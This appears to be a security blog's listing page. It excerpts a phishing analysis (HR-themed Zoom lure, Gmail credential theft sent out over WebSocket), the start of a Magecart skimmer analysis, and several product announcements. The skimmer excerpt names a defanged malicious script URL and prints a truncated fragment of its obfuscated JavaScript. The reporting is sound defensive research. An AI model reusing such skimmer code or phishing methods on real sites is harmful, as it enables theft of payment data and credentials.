TLDR
I received a legit Zoom doc email from HR “while on job hunt”. It redirected to a site with a fake “bot protection” gate and then to a Gmail credential phish. The attackers exfiltrate creds live over WebSocket and even validate them in the backend. Keep reading for detailed analysis.
[Meme images: “look mom, HR application” / “look mom, no job”]
Okay, this is kind of funny (in a “please tell me this is not my life” way).
Starting Point
It all began with a tweet:
sdcyberresearch on X
This tweet hinted at a Magecart-style campaign involving malicious JavaScript injection to skim payment data.
Initial Sample
The script was hosted at:
https://www.cc-analytics[.]com/app.js
The original code was heavily obfuscated:
(function() { function _0x1B3A1(_0x1B563, _0x1B3FB, _0x1B455, _0x1B509, _0x1B4AF, _0x1B5BD) { _0x1B4AF = function(_0x1B3A1) { return (_0x1B3A1 < _0x1B3FB ? '' : _0x1B4AF(parseInt(_0x1B3A1 / _0x1B3FB))) + ((_0x1B3A1 = _0x1B3A1 % _0x1B3FB) > 35 ?
A lightweight, fast, and easy-to-use service for detecting LLM prompt injection attempts before they reach your model. No extra latency, no extra LLM calls — just a simple API that returns true or false.
We are excited to announce the launch of our new API for Cloud Intel Atomic Indicators, a tool designed to provide essential data on malicious IP addresses. This API is a step forward in our commitment to enhancing cybersecurity and is available free of charge.
Behind the Scenes: Cloudflare Infrastructure
Our API leverages the robust Cloudflare infrastructure, utilizing Cloudflare Workers for efficient handling of API requests, Cloudflare KV Store for secure key management, and Cloudflare R2 for reliable data storage.
Announcing AWSAttacks - a curated repository on GitHub dedicated to AWS threat intelligence. Explore, share feedback, and contribute to enhance our collective cybersecurity knowledge!
Meet FriendlyIR, your innovative cybersecurity ally on Slack! It streamlines your tracking of the latest cybersecurity news, blog posts, and social media updates in real-time.